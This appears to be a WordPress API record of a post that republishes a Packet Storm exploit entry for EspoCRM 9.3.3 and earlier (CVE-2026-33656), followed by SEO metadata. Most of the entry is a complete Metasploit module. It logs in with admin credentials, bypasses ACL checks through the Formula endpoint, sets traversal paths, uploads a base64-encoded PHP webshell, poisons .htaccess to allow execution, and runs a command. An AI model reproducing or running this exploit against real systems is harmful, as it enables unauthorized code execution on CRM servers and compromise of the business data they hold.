{"id":47684,"date":"2026-04-17T12:36:55","date_gmt":"2026-04-17T12:36:55","guid":{"rendered":"http:\/\/localhost\/?p=47684"},"modified":"2026-04-17T12:36:55","modified_gmt":"2026-04-17T12:36:55","slug":"espocrm-933-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=47684","title":{"rendered":"\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution_PACKETSTORM:219085"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-17T17:23:22&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module targets an authenticated remote code execution vulnerability in EspoCRM versions 9.3.3 and below&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-17T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-17T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:219085&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-33656&#8243;],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================\\n    | # Title     : EspoCRM \u2264 9.3.3 Authenticated RCE Exploit via Formula ACL Bypass and Attachment Abuse                            |\\n    | # Author    : indoushka                                                                                                        |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\\n    | # Vendor    : https:\/\/www.espocrm.com\/download\/upgrades\/                                                                       |\\n    ==================================================================================================================================\\n    \\n    [+] Summary    : This Metasploit module targets an authenticated Remote Code Execution (RCE) vulnerability in EspoCRM versions up to 9.3.3.\\n    \\n    [+] The exploit chain works as follows:\\n    \\n    Authenticates to the EspoCRM API using provided credentials.\\n    Creates a malicious attachment entry via the Attachment API.\\n    Abuses a Formula Engine endpoint to bypass ACL restrictions.\\n    Uses the formula execution to manipulate internal attachment paths (path traversal).\\n    Uploads a PHP webshell payload through chunked attachment upload.\\n    Poisones a .htaccess file to enable execution of PHP code in a restricted directory.\\n    Triggers the uploaded webshell via an HTTP request with a command parameter (whoami as proof of execution).\\n    \\n    \\n    [+] POC   :  \\n    \\n    ##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Remote\\n      Rank = ExcellentRanking\\n    \\n      include Msf::Exploit::Remote::HttpClient\\n    \\n      def initialize(info = {})\\n        super(\\n          update_info(\\n            info,\\n            &#8216;Name&#8217; =\\u003e &#8216;EspoCRM \\u003c= 9.3.3 Authenticated RCE via Formula ACL Bypass&#8217;,\\n            &#8216;Description&#8217; =\\u003e %q{\\n              Authenticated RCE in EspoCRM via formula ACL bypass + attachment abuse.\\n            },\\n            &#8216;Author&#8217; =\\u003e [\\n              &#8216;indoushka&#8217;\\n            ],\\n            &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n            &#8216;References&#8217; =\\u003e [\\n              [ &#8216;URL&#8217;, &#8216;https:\/\/jivasecurity.com\/writeups\/espocrm-rce&#8217; ],\\n              [ &#8216;CVE&#8217;, &#8216;2026-33656&#8217; ]\\n            ],\\n            &#8216;Platform&#8217; =\\u003e [&#8216;php&#8217;],\\n            &#8216;Arch&#8217; =\\u003e [ARCH_PHP],\\n            &#8216;Targets&#8217; =\\u003e [\\n              [ &#8216;EspoCRM \\u003c= 9.3.3&#8217;, { &#8216;Platform&#8217; =\\u003e &#8216;php&#8217;, &#8216;Arch&#8217; =\\u003e ARCH_PHP } ]\\n            ],\\n            &#8216;DefaultTarget&#8217; =\\u003e 0,\\n            &#8216;DisclosureDate&#8217; =\\u003e &#8216;2026-01-01&#8217;\\n          )\\n        )\\n    \\n        register_options(\\n          [\\n            Opt::RPORT(80),\\n            OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;Base path&#8217;, &#8216;\/&#8217;]),\\n            OptString.new(&#8216;USERNAME&#8217;, [true, &#8216;Username&#8217;, &#8216;admin&#8217;]),\\n            OptString.new(&#8216;PASSWORD&#8217;, [true, &#8216;Password&#8217;, &#8216;admin&#8217;])\\n          ]\\n        )\\n      end\\n    \\n      def auth_headers\\n        creds = \\&#8221;#{datastore[&#8216;USERNAME&#8217;]}:#{datastore[&#8216;PASSWORD&#8217;]}\\&#8221;\\n        token = Rex::Text.encode_base64(creds)\\n    \\n        {\\n          &#8216;Espo-Authorization&#8217; =\\u003e token\\n        }\\n      end\\n    \\n      def check\\n        res = send_request_cgi(\\n          &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;api\/v1\/App\/user&#8217;),\\n          &#8216;headers&#8217; =\\u003e auth_headers\\n        )\\n    \\n        return Exploit::CheckCode::Detected if res \\u0026\\u0026 res.code == 200\\n        Exploit::CheckCode::Safe\\n      end\\n    \\n      def create_attachment(name, content_type, size)\\n        res = send_request_cgi(\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;api\/v1\/Attachment&#8217;),\\n          &#8216;headers&#8217; =\\u003e auth_headers.merge({\\n            &#8216;Content-Type&#8217; =\\u003e &#8216;application\/json&#8217;\\n          }),\\n          &#8216;data&#8217; =\\u003e {\\n            &#8216;name&#8217; =\\u003e name,\\n            &#8216;type&#8217; =\\u003e content_type,\\n            &#8216;role&#8217; =\\u003e &#8216;Attachment&#8217;,\\n            &#8216;relatedType&#8217; =\\u003e &#8216;Document&#8217;,\\n            &#8216;field&#8217; =\\u003e &#8216;file&#8217;,\\n            &#8216;isBeingUploaded&#8217; =\\u003e true,\\n            &#8216;size&#8217; =\\u003e size\\n          }.to_json\\n        )\\n    \\n        return nil unless res \\u0026\\u0026 res.code == 200\\n        res.get_json_document\\u0026.dig(&#8216;id&#8217;)\\n      end\\n    \\n      def run_formula(attachment_id, source_path)\\n        expr = \\&#8221;record\\\\\\\\update(\\\\\\&#8221;Attachment\\\\\\&#8221;,\\\\\\&#8221;#{attachment_id}\\\\\\&#8221;,\\\\\\&#8221;sourceId\\\\\\&#8221;,\\\\\\&#8221;#{source_path}\\\\\\&#8221;)\\&#8221;\\n    \\n        res = send_request_cgi(\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;api\/v1\/Formula\/action\/run&#8217;),\\n          &#8216;headers&#8217; =\\u003e auth_headers.merge({\\n            &#8216;Content-Type&#8217; =\\u003e &#8216;application\/json&#8217;\\n          }),\\n          &#8216;data&#8217; =\\u003e {\\n            &#8216;expression&#8217; =\\u003e expr,\\n            &#8216;targetType&#8217; =\\u003e nil,\\n            &#8216;targetId&#8217; =\\u003e nil\\n          }.to_json\\n        )\\n    \\n        return false unless res \\u0026\\u0026 res.code == 200\\n    \\n        json = res.get_json_document rescue nil\\n        json \\u0026\\u0026 json[&#8216;isSuccess&#8217;] == true\\n      end\\n    \\n      def upload_chunk(attachment_id, payload_base64)\\n        send_request_cgi(\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, \\&#8221;api\/v1\/Attachment\/chunk\/#{attachment_id}\\&#8221;),\\n          &#8216;headers&#8217; =\\u003e auth_headers.merge({\\n            &#8216;Content-Type&#8217; =\\u003e &#8216;application\/octet-stream&#8217;\\n          }),\\n          &#8216;data&#8217; =\\u003e \\&#8221;data:application\/octet-stream;base64,#{payload_base64}\\&#8221;\\n        )\\n      end\\n    \\n      def exploit\\n        print_status(\\&#8221;Creating attachment&#8230;\\&#8221;)\\n        shell_id = create_attachment(&#8216;shell.txt&#8217;, &#8216;text\/plain&#8217;, 0)\\n        fail_with(Failure::UnexpectedReply, \\&#8221;Attachment failed\\&#8221;) unless shell_id\\n    \\n        print_good(\\&#8221;Attachment ID: #{shell_id}\\&#8221;)\\n    \\n        print_status(\\&#8221;Bypassing ACL via formula&#8230;\\&#8221;)\\n        fail_with(Failure::UnexpectedReply, \\&#8221;Formula failed\\&#8221;) unless run_formula(shell_id, &#8216;..\/..\/client\/x&#8217;)\\n    \\n        print_good(\\&#8221;Path traversal set\\&#8221;)\\n    \\n        print_status(\\&#8221;Uploading PHP payload&#8230;\\&#8221;)\\n        php_payload = \\&#8221;PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOyA\/Pg==\\&#8221;\\n        upload_chunk(shell_id, php_payload)\\n    \\n        print_good(\\&#8221;Webshell written\\&#8221;)\\n    \\n        print_status(\\&#8221;Creating .htaccess entry&#8230;\\&#8221;)\\n        ht_id = create_attachment(&#8216;ht.txt&#8217;, &#8216;text\/plain&#8217;, 0)\\n        fail_with(Failure::UnexpectedReply, \\&#8221;HT creation failed\\&#8221;) unless ht_id\\n    \\n        fail_with(Failure::UnexpectedReply, \\&#8221;HT formula failed\\&#8221;) unless run_formula(ht_id, &#8216;..\/..\/.htaccess&#8217;)\\n    \\n        ht_payload = \\&#8221;CjxGaWxlc01hdGNoICJeeCQiPgpTZXRIYW5kbGVyIGFwcGxpY2F0aW9uL3gtaHR0cGQtcGhwCjwvRmlsZXNNYXRjaD4=\\&#8221;\\n        upload_chunk(ht_id, ht_payload)\\n    \\n        print_good(\\&#8221;.htaccess poisoned\\&#8221;)\\n    \\n        webshell = normalize_uri(target_uri.path, &#8216;client\/x&#8217;)\\n    \\n        print_status(\\&#8221;Executing: #{webshell}\\&#8221;)\\n    \\n        res = send_request_cgi(\\n          &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n          &#8216;uri&#8217; =\\u003e webshell,\\n          &#8216;vars_get&#8217; =\\u003e {\\n            &#8216;c&#8217; =\\u003e &#8216;whoami&#8217;\\n          }\\n        )\\n    \\n        if res \\u0026\\u0026 res.code == 200\\n          print_good(\\&#8221;Execution success\\&#8221;)\\n          print_line(res.body.to_s) if res.body\\n        else\\n          fail_with(Failure::UnexpectedReply, \\&#8221;Execution failed\\&#8221;)\\n        end\\n      end\\n    end\\n    \\n    \\n    Greetings to :==============================================================================\\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n    ============================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/219085&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/219085\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-17T17:23:22&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module targets an authenticated remote code execution vulnerability in EspoCRM versions 9.3.3 and below&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-17T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-17T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:219085&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-33656&#8243;],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================\\n | # Title :&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-47684","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution_PACKETSTORM:219085 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=47684\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution_PACKETSTORM:219085 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-17T17:23:22&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module targets an authenticated remote code execution vulnerability in EspoCRM versions 9.3.3 and below&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-17T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-17T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:219085&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-33656&#8243;],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================n | # Title :...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=47684\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-17T12:36:55+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47684#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47684\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution_PACKETSTORM:219085\",\"datePublished\":\"2026-04-17T12:36:55+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47684\"},\"wordCount\":1066,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=47684#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47684\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47684\",\"name\":\"\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution_PACKETSTORM:219085 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-17T12:36:55+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47684#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=47684\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47684#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution_PACKETSTORM:219085\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution_PACKETSTORM:219085 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=47684","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution_PACKETSTORM:219085 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-17T17:23:22&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module targets an authenticated remote code execution vulnerability in EspoCRM versions 9.3.3 and below&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-17T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-17T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:219085&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-33656&#8243;],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================n | # Title :...","og_url":"https:\/\/zero.redgem.net\/?p=47684","og_site_name":"zero redgem","article_published_time":"2026-04-17T12:36:55+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=47684#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=47684"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution_PACKETSTORM:219085","datePublished":"2026-04-17T12:36:55+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=47684"},"wordCount":1066,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=47684#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=47684","url":"https:\/\/zero.redgem.net\/?p=47684","name":"\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution_PACKETSTORM:219085 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-17T12:36:55+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=47684#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=47684"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=47684#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution_PACKETSTORM:219085"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/47684","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=47684"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/47684\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=47684"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=47684"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=47684"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}